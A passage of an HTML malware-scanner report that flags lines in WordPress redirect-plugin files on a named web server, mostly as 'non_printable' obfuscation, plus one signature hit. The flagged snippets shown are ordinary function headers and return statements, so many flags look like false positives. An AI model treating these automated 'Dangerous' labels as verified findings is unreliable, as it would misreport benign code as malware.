<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_225").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/eps-form-elements.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_226" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">eps_get_ordered_filter</span><span style="color: #007700">(</span><span style="color: #0000BB">$field</span><span style="color: #007700">, </span><span style="color: #0000BB">$label</span><span style="color: #007700">, </span><span style="color: #0000BB">$classes </span><span style="color: #007700">= array()) { global </span><span style="color: #0000BB">$EPS_Redirects_Plugin</span><span style="color: #007700">; </span><span style="color: #0000BB">$nextOrder </span><span style="color: #007700">= </span><span style="color: #DD0000">'asc'</span><span style="color: #007700">; </span><span style="color: #0000BB">$arrow </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">; if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'orderby'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">sanitize_text_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'orderby'</span><span style="color: #007700">]) == </span><span style="color: #0000BB">$field</span><span style="color: #007700">) { </span><span style="color: #0000BB">$arrow </span><span style="color: #007700">= </span><span style="color: #DD0000">'&darr;'</span><span style="color: #007700">; if (isset(</span><span style="color: #0000BB">$_</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will output the available destination types</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_type_select</span><span style="color: #007700">(</span><span style="color: #0000BB">$post_types</span><span style="color: #007700">, </span><span style="color: #0000BB">$current_post </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will output the available post types</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_post_type_selects</span><span style="color: #007700">(</span><span style="color: #0000BB">$post_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$current_post </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 171</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will output a select box with all the taxonomies </span><span style="color: #007700">and </span><span style="color: #0000BB">terms</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_term_archive_select</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_ordered_filter</span><span style="color: #007700">(</span><span style="color: #0000BB">$field</span><span style="color: #007700">, </span><span style="color: #0000BB">$label</span><span style="color: #007700">, </span><span style="color: #0000BB">$classes </span><span style="color: #007700">= array())</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will initialze a series of html form elements so a user can narrow down their redirect destination</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_selector</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will output the formatted destination string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_get_destination</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_226").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/eps-301-redirects.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 65</span><br><table id="file_227" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_redirects_pro_conflict</span><span style="color: #007700">() { </span><span style="color: #0000BB">$deactivate </span><span style="color: #007700">= </span><span style="color: #DD0000">'plugins.php?action=deactivate&plugin=eps-301-redirects/eps-301-redirects.php&plugin_status=all&paged=1'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivate </span><span style="color: #007700">= </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$deactivate</span><span style="color: #007700">, </span><span style="color: #DD0000">'deactivate-plugin_eps-301-redirects/eps-301-redirects.php'</span><span style="color: #007700">); print</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_redirects_pro_conflict</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dismiss_pointer_ajax</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_widget</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_kses_wf</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$styles</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$styles</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">widget_content</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will redirect the user </span><span style="color: #007700">if </span><span style="color: #0000BB">it can resolve that this url request has a redirect</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_redirect</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #FF8000">// No redirects.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_footer_text</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 540</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_plugin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 556</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">url string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">format_from_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$from</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 574</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">returns the current url</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">URL string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 580</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_request_uri</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 594</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">of redirects</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_parse_serial_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$array</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$new_redirects</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 625</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">nothing</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_save_redirect</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned id</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 677</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">redirect_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 683</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$result</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$result </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
